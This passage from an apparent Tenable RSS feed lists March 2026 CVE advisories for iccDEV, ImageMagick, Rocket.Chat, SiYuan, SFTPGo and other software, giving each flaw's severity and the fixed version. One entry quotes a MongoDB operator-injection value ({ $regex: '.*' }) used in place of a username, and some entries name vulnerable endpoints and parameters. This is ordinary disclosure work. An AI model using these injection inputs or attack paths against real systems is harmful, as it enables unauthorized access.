    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-31797]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-31797</link>
            <guid>https://www.tenable.com/cve/CVE-2026-31797</guid>
            <pubDate>Tue, 10 Mar 2026 18:19:00 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>iccDEV provides a set of libraries and tools for working with ICC color management profiles. Prior to 2.3.1.5, there is a heap out-of-bounds read in CTiffImg::ReadLine() when iccApplyProfiles processes a crafted TIFF image, causing memory disclosure or crash. This vulnerability is fixed in 2.3.1.5.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-31797">https://www.tenable.com/cve/CVE-2026-31797</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-31796]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-31796</link>
            <guid>https://www.tenable.com/cve/CVE-2026-31796</guid>
            <pubDate>Tue, 10 Mar 2026 18:19:00 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>iccDEV provides a set of libraries and tools for working with ICC color management profiles. Prior to 2.3.1.5, there is a heap-based buffer overflow in icCurvesFromXml() causing heap memory corruption or a crash. This vulnerability is fixed in 2.3.1.5.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-31796">https://www.tenable.com/cve/CVE-2026-31796</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-31795]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-31795</link>
            <guid>https://www.tenable.com/cve/CVE-2026-31795</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:59 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>iccDEV provides a set of libraries and tools for working with ICC color management profiles. Prior to 2.3.1.5, there is a stack buffer overflow write in CIccXform3DLut::Apply() that corrupts stack memory or causes a crash. This vulnerability is fixed in 2.3.1.5.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-31795">https://www.tenable.com/cve/CVE-2026-31795</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-31794]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-31794</link>
            <guid>https://www.tenable.com/cve/CVE-2026-31794</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:59 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>iccDEV provides a set of libraries and tools for working with ICC color management profiles. Prior to 2.3.1.5, there is a segmentation fault from invalid/wild pointer read in CIccCLUT::Interp3d() causing a denial of service. This vulnerability is fixed in 2.3.1.5.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-31794">https://www.tenable.com/cve/CVE-2026-31794</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-31793]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-31793</link>
            <guid>https://www.tenable.com/cve/CVE-2026-31793</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:59 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>iccDEV provides a set of libraries and tools for working with ICC color management profiles. Prior to 2.3.1.5, there is a segmentation fault due to an invalid/wild pointer read in CIccCalculatorFunc::ApplySequence() causing a denial of service. This vulnerability is fixed in 2.3.1.5.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-31793">https://www.tenable.com/cve/CVE-2026-31793</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-31792]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-31792</link>
            <guid>https://www.tenable.com/cve/CVE-2026-31792</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:59 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>iccDEV provides a set of libraries and tools for working with ICC color management profiles. Prior to 2.3.1.5, there is a null pointer dereference in CIccTagXmlStruct::ParseTag() causing a segmentation fault or denial of service. This vulnerability is fixed in 2.3.1.5.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-31792">https://www.tenable.com/cve/CVE-2026-31792</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-30987]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-30987</link>
            <guid>https://www.tenable.com/cve/CVE-2026-30987</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:58 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>iccDEV provides a set of libraries and tools for working with ICC color management profiles. Prior to 2.3.1.5, there is a stack buffer overflow in CIccTagNum<>::GetValues() causing stack memory corruption or crash. This vulnerability is fixed in 2.3.1.5.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-30987">https://www.tenable.com/cve/CVE-2026-30987</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-30986]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-30986</link>
            <guid>https://www.tenable.com/cve/CVE-2026-30986</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:57 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>iccDEV provides a set of libraries and tools for working with ICC color management profiles. Prior to 2.3.1.5, there is a heap-based buffer overflow write in CIccMatrixMath::SetRange() causing memory corruption or crash. This vulnerability is fixed in 2.3.1.5.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-30986">https://www.tenable.com/cve/CVE-2026-30986</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-30985]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-30985</link>
            <guid>https://www.tenable.com/cve/CVE-2026-30985</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:57 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>iccDEV provides a set of libraries and tools for working with ICC color management profiles. Prior to 2.3.1.5, there is a heap-based buffer overflow write in CIccMatrixMath::SetRange() causing memory corruption or crash. This vulnerability is fixed in 2.3.1.5.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-30985">https://www.tenable.com/cve/CVE-2026-30985</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-30984]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-30984</link>
            <guid>https://www.tenable.com/cve/CVE-2026-30984</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:57 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>iccDEV provides a set of libraries and tools for working with ICC color management profiles. Prior to 2.3.1.5, there is a heap out-of-bounds read in CIccCalculatorFunc::ApplySequence() causing an application crash. This vulnerability is fixed in 2.3.1.5.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-30984">https://www.tenable.com/cve/CVE-2026-30984</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-30983]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-30983</link>
            <guid>https://www.tenable.com/cve/CVE-2026-30983</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:57 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>iccDEV provides a set of libraries and tools for working with ICC color management profiles. Prior to 2.3.1.5, there is a stack buffer overflow in icFixXml() (strcpy) causing stack memory corruption or crash. This vulnerability is fixed in 2.3.1.5.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-30983">https://www.tenable.com/cve/CVE-2026-30983</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-30982]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-30982</link>
            <guid>https://www.tenable.com/cve/CVE-2026-30982</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:57 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>iccDEV provides a set of libraries and tools for working with ICC color management profiles. Prior to 2.3.1.5, there is a heap out-of-bounds read in CIccPcsXform::pushXYZConvert() causing a crash and potentially leaking memory contents. This vulnerability is fixed in 2.3.1.5.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-30982">https://www.tenable.com/cve/CVE-2026-30982</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-30981]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-30981</link>
            <guid>https://www.tenable.com/cve/CVE-2026-30981</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:57 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>iccDEV provides a set of libraries and tools for working with ICC color management profiles. Prior to 2.3.1.5, there is a heap-buffer-overflow read in CIccXmlArrayType<>::DumpArray() causing out-of-bounds read and/or crash. This vulnerability is fixed in 2.3.1.5.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-30981">https://www.tenable.com/cve/CVE-2026-30981</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-30980]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-30980</link>
            <guid>https://www.tenable.com/cve/CVE-2026-30980</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:56 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>iccDEV provides a set of libraries and tools for working with ICC color management profiles. Prior to 2.3.1.5, there is a stack overflow in CIccBasicStructFactory::CreateStruct() causing uncontrolled recursion/stack exhaustion and crash. This vulnerability is fixed in 2.3.1.5.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-30980">https://www.tenable.com/cve/CVE-2026-30980</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-30979]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-30979</link>
            <guid>https://www.tenable.com/cve/CVE-2026-30979</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:56 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>iccDEV provides a set of libraries and tools for working with ICC color management profiles. Prior to 2.3.1.5, there is a heap-based buffer overflow in CIccCalculatorFunc::InitSelectOp() triggered with local user interaction causing memory corruption/crash. This vulnerability is fixed in 2.3.1.5.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-30979">https://www.tenable.com/cve/CVE-2026-30979</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-30978]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-30978</link>
            <guid>https://www.tenable.com/cve/CVE-2026-30978</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:56 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>iccDEV provides a set of libraries and tools for working with ICC color management profiles. Prior to 2.3.1.5, there is a heap-use-after-free in CIccCmm::AddXform() causing invalid vptr dereference and crash. This vulnerability is fixed in 2.3.1.5.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-30978">https://www.tenable.com/cve/CVE-2026-30978</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-30974]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-30974</link>
            <guid>https://www.tenable.com/cve/CVE-2026-30974</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:56 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Copyparty is a portable file server. Prior to v1.20.11, the nohtml config option, intended to prevent execution of JavaScript in user-uploaded HTML files, did not apply to SVG images. A user with write permission could upload an SVG containing embedded JavaScript, which would execute in the context of whichever user opens it. This has been fixed in v1.20.11.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-30974">https://www.tenable.com/cve/CVE-2026-30974</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-30970]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-30970</link>
            <guid>https://www.tenable.com/cve/CVE-2026-30970</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:55 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Coral Server is open collaboration infrastructure that enables communication, coordination, trust and payments for The Internet of Agents. Prior to 1.1.0, Coral Server allowed the creation of agent sessions through the /api/v1/sessions endpoint without strong authentication. This endpoint performs resource-intensive initialization operations including container spawning and memory context creation. An attacker capable of accessing the endpoint could create sessions or consume system resources without proper authorization. This vulnerability is fixed in 1.1.0.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-30970">https://www.tenable.com/cve/CVE-2026-30970</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-30969]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-30969</link>
            <guid>https://www.tenable.com/cve/CVE-2026-30969</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:55 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Coral Server is open collaboration infrastructure that enables communication, coordination, trust and payments for The Internet of Agents. Prior to 1.1.0, Coral Server did not enforce strong authentication between agents and the server within an active session. This could allow an attacker who obtained or predicted a session identifier to impersonate an agent or join an existing session. This vulnerability is fixed in 1.1.0.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-30969">https://www.tenable.com/cve/CVE-2026-30969</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-30968]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-30968</link>
            <guid>https://www.tenable.com/cve/CVE-2026-30968</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:55 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Coral Server is open collaboration infrastructure that enables communication, coordination, trust and payments for The Internet of Agents. Prior to 1.1.0, the SSE endpoint (/sse/v1/...) in Coral Server did not strongly validate that a connecting agent was a legitimate participant in the session. This could theoretically allow unauthorized message injection or observation. This vulnerability is fixed in 1.1.0.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-30968">https://www.tenable.com/cve/CVE-2026-30968</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-30961]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-30961</link>
            <guid>https://www.tenable.com/cve/CVE-2026-30961</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:35 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Gokapi is a self-hosted file sharing server with automatic expiration and encryption support. Prior to 2.2.4, the chunked upload completion path for file requests does not validate the total file size against the per-request MaxSize limit. An attacker with a public file request link can split an oversized file into chunks each under MaxSize and upload them sequentially, bypassing the size restriction entirely. Files up to the server's global MaxFileSizeMB are accepted regardless of the file request's configured limit. This vulnerability is fixed in 2.2.4.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-30961">https://www.tenable.com/cve/CVE-2026-30961</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-30955]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-30955</link>
            <guid>https://www.tenable.com/cve/CVE-2026-30955</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:35 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Gokapi is a self-hosted file sharing server with automatic expiration and encryption support. Prior to 2.2.4, an API endpoint accepts unbounded request bodies without any size limit. An authenticated user can cause an OOM kill and complete service disruption for all users. This vulnerability is fixed in 2.2.4.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-30955">https://www.tenable.com/cve/CVE-2026-30955</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-30943]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-30943</link>
            <guid>https://www.tenable.com/cve/CVE-2026-30943</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:35 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Gokapi is a self-hosted file sharing server with automatic expiration and encryption support. Prior to 2.2.4, an insufficient authorization check in the file replace API allows a user with only list visibility permission (UserPermListOtherUploads) to delete another user's file by abusing the deleteNewFile flag, bypassing the requirement for UserPermDeleteOtherUploads. This vulnerability is fixed in 2.2.4.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-30943">https://www.tenable.com/cve/CVE-2026-30943</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-30931]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-30931</link>
            <guid>https://www.tenable.com/cve/CVE-2026-30931</guid>
            <pubDate>Tue, 10 Mar 2026 07:44:57 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to version 7.1.2-16, a heap-based buffer overflow in the UHDR encoder can occur due to truncation of a value, allowing an out-of-bounds write. This vulnerability is fixed in 7.1.2-16.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-30931">https://www.tenable.com/cve/CVE-2026-30931</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-30929]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-30929</link>
            <guid>https://www.tenable.com/cve/CVE-2026-30929</guid>
            <pubDate>Tue, 10 Mar 2026 07:44:57 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to versions 7.1.2-16 and 6.9.13-41, MagnifyImage uses a fixed-size stack buffer. When using a specific image it is possible to overflow this buffer and corrupt the stack. This vulnerability is fixed in 7.1.2-16 and 6.9.13-41.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-30929">https://www.tenable.com/cve/CVE-2026-30929</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-30927]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-30927</link>
            <guid>https://www.tenable.com/cve/CVE-2026-30927</guid>
            <pubDate>Tue, 10 Mar 2026 17:40:16 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Admidio is an open-source user management solution. Prior to 5.0.6, in modules/events/events_function.php, the event participation logic allows any user who can participate in an event to register OTHER users by manipulating the user_uuid GET parameter. The condition uses || (OR), meaning if possibleToParticipate() returns true (event is open for participation), ANY user - not just leaders - can specify a different user_uuid and register/cancel participation for that user. The code then operates on $user->getValue('usr_id') (the target user from user_uuid) rather than the current user. This vulnerability is fixed in 5.0.6.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-30927">https://www.tenable.com/cve/CVE-2026-30927</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-30926]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-30926</link>
            <guid>https://www.tenable.com/cve/CVE-2026-30926</guid>
            <pubDate>Tue, 10 Mar 2026 07:44:56 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>SiYuan is a personal knowledge management system. Prior to 3.5.10, a privilege escalation vulnerability exists in the publish service of SiYuan Note that allows low-privilege publish accounts (RoleReader) to modify notebook content via the /api/block/appendHeadingChildren API endpoint. The endpoint requires only the model.CheckAuth role, which accepts RoleReader sessions, but it does not enforce stricter checks, such as CheckAdminRole or CheckReadonly. This allows remote authenticated publish users with read-only privileges to append new blocks to existing documents, compromising the integrity of stored notes.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-30926">https://www.tenable.com/cve/CVE-2026-30926</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-30919]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-30919</link>
            <guid>https://www.tenable.com/cve/CVE-2026-30919</guid>
            <pubDate>Tue, 10 Mar 2026 17:40:15 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>facileManager is a modular suite of web apps built with the sysadmin in mind. Prior to 6.0.4, stored XSS (also known as persistent or second-order XSS) occurs when an application receives data from an untrusted source and includes that data in its subsequent HTTP responses in an unsafe manner. This vulnerability was found in the fmDNS module. This vulnerability is fixed in 6.0.4.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-30919">https://www.tenable.com/cve/CVE-2026-30919</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-30918]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-30918</link>
            <guid>https://www.tenable.com/cve/CVE-2026-30918</guid>
            <pubDate>Tue, 10 Mar 2026 17:40:15 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>facileManager is a modular suite of web apps built with the sysadmin in mind. Prior to 6.0.4, a reflected XSS occurs when an application receives data from an untrusted source and uses it in its HTTP responses in a way that could lead to vulnerabilities. It is possible to inject malicious JavaScript code into a URL by adding a script in a parameter. This vulnerability was found in the fmDNS module. The parameter that is vulnerable to an XSS attack is log_search_query. This vulnerability is fixed in 6.0.4.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-30918">https://www.tenable.com/cve/CVE-2026-30918</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-30915]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-30915</link>
            <guid>https://www.tenable.com/cve/CVE-2026-30915</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:35 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>SFTPGo is an open source, event-driven file transfer solution. SFTPGo versions before v2.7.1 contain an input validation issue in the handling of dynamic group paths, for example, home directories or key prefixes. When a group is configured with a dynamic home directory or key prefix using placeholders like %username%, the value replacing the placeholder is not strictly sanitized against relative path components. Consequently, if a user is created with a specially crafted username, the resulting path may resolve to a parent directory instead of the intended sub-directory. This issue is fixed in version v2.7.1.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-30915">https://www.tenable.com/cve/CVE-2026-30915</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-30914]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-30914</link>
            <guid>https://www.tenable.com/cve/CVE-2026-30914</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:35 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>SFTPGo is an open source, event-driven file transfer solution. In SFTPGo versions prior to 2.7.1, a path normalization discrepancy between the protocol handlers and the internal Virtual Filesystem routing can lead to an authorization bypass. An authenticated attacker can craft specific file paths to bypass folder-level permissions or escape the boundaries of a configured Virtual Folder. This vulnerability is fixed in 2.7.1.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-30914">https://www.tenable.com/cve/CVE-2026-30914</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-30885]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-30885</link>
            <guid>https://www.tenable.com/cve/CVE-2026-30885</guid>
            <pubDate>Tue, 10 Mar 2026 17:40:14 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>WWBN AVideo is an open source video platform. Prior to 25.0, the /objects/playlistsFromUser.json.php endpoint returns all playlists for any user without requiring authentication or authorization. An unauthenticated attacker can enumerate user IDs and retrieve playlist information including playlist names, video IDs, and playlist status for any user on the platform. This vulnerability is fixed in 25.0.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-30885">https://www.tenable.com/cve/CVE-2026-30885</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-30883]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-30883</link>
            <guid>https://www.tenable.com/cve/CVE-2026-30883</guid>
            <pubDate>Tue, 10 Mar 2026 07:44:56 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to versions 7.1.2-16 and 6.9.13-41, an extremely large image profile could result in a heap overflow when encoding a PNG image. This vulnerability is fixed in 7.1.2-16 and 6.9.13-41.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-30883">https://www.tenable.com/cve/CVE-2026-30883</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-30869]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-30869</link>
            <guid>https://www.tenable.com/cve/CVE-2026-30869</guid>
            <pubDate>Tue, 10 Mar 2026 17:40:14 GMT</pubDate>
            <description><![CDATA[
      <p>Critical Severity</p>

      <h3>Description</h3>
      <p>SiYuan is a personal knowledge management system. Prior to 3.5.10, a path traversal vulnerability in the /export endpoint allows an attacker to read arbitrary files from the server filesystem. By exploiting double‑encoded traversal sequences, an attacker can access sensitive files such as conf/conf.json, which contains secrets including the API token, cookie signing key, and workspace access authentication code. Leaking these secrets may enable administrative access to the SiYuan kernel API, and in certain deployment scenarios could potentially be chained into remote code execution (RCE). This vulnerability is fixed in 3.5.10.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-30869">https://www.tenable.com/cve/CVE-2026-30869</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-30862]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-30862</link>
            <guid>https://www.tenable.com/cve/CVE-2026-30862</guid>
            <pubDate>Tue, 10 Mar 2026 17:40:14 GMT</pubDate>
            <description><![CDATA[
      <p>Critical Severity</p>

      <h3>Description</h3>
      <p>Appsmith is a platform to build admin panels, internal tools, and dashboards. Prior to 1.96, a Critical Stored XSS vulnerability exists in the Table Widget (TableWidgetV2). The root cause is a lack of HTML sanitization in the React component rendering pipeline, allowing malicious attributes to be interpolated into the DOM. By leveraging the "Invite Users" feature, an attacker with a regular user account (user@gmail.com) can force a System Administrator to execute a high-privileged API call (/api/v1/admin/env), resulting in a Full Administrative Account Takeover. This vulnerability is fixed in 1.96.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-30862">https://www.tenable.com/cve/CVE-2026-30862</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-30853]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-30853</link>
            <guid>https://www.tenable.com/cve/CVE-2026-30853</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:35 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>calibre is a cross-platform e-book manager for viewing, converting, editing, and cataloging e-books. Prior to 9.5.0, a path traversal vulnerability in the RocketBook (.rb) input plugin (src/calibre/ebooks/rb/reader.py) allows an attacker to write arbitrary files to any path writable by the calibre process when a user opens or converts a crafted .rb file. This is the same bug class fixed in CVE-2026-26065 for the PDB readers, but the fix was never applied to the RB reader. This vulnerability is fixed in 9.5.0.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-30853">https://www.tenable.com/cve/CVE-2026-30853</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-30833]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-30833</link>
            <guid>https://www.tenable.com/cve/CVE-2026-30833</guid>
            <pubDate>Fri, 06 Mar 2026 18:16:22 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Rocket.Chat is an open-source, secure, fully customizable communications platform. Prior to versions 7.10.8, 7.11.5, 7.12.5, 7.13.4, 8.0.2, 8.1.1, and 8.2.0, a NoSQL injection vulnerability exists in Rocket.Chat's account service used in the ddp-streamer micro service that allows unauthenticated attackers to manipulate MongoDB queries during authentication. The vulnerability is located in the username-based login flow where user-supplied input is directly embedded into a MongoDB query selector without validation. An attacker can inject MongoDB operator expressions (e.g., { $regex: '.*' }) in place of a username string, causing the database query to match unintended user records. This issue has been patched in versions 7.10.8, 7.11.5, 7.12.5, 7.13.4, 8.0.2, 8.1.1, and 8.2.0.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-30833">https://www.tenable.com/cve/CVE-2026-30833</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-30831]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-30831</link>
            <guid>https://www.tenable.com/cve/CVE-2026-30831</guid>
            <pubDate>Fri, 06 Mar 2026 18:16:21 GMT</pubDate>
            <description><![CDATA[
      <p>Critical Severity</p>

      <h3>Description</h3>
      <p>Rocket.Chat is an open-source, secure, fully customizable communications platform. Prior to versions 7.10.8, 7.11.5, 7.12.5, 7.13.4, 8.0.2, 8.1.1, and 8.2.0, authentication vulnerabilities exist in Rocket.Chat's enterprise DDP Streamer service. The Account.login method exposed through the DDP Streamer does not enforce Two-Factor Authentication (2FA) or validate user account status (deactivated users can still login), despite these checks being mandatory in the standard Meteor login flow. This issue has been patched in versions 7.10.8, 7.11.5, 7.12.5, 7.13.4, 8.0.2, 8.1.1, and 8.2.0.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-30831">https://www.tenable.com/cve/CVE-2026-30831</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-3045]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-3045</link>
            <guid>https://www.tenable.com/cve/CVE-2026-3045</guid>
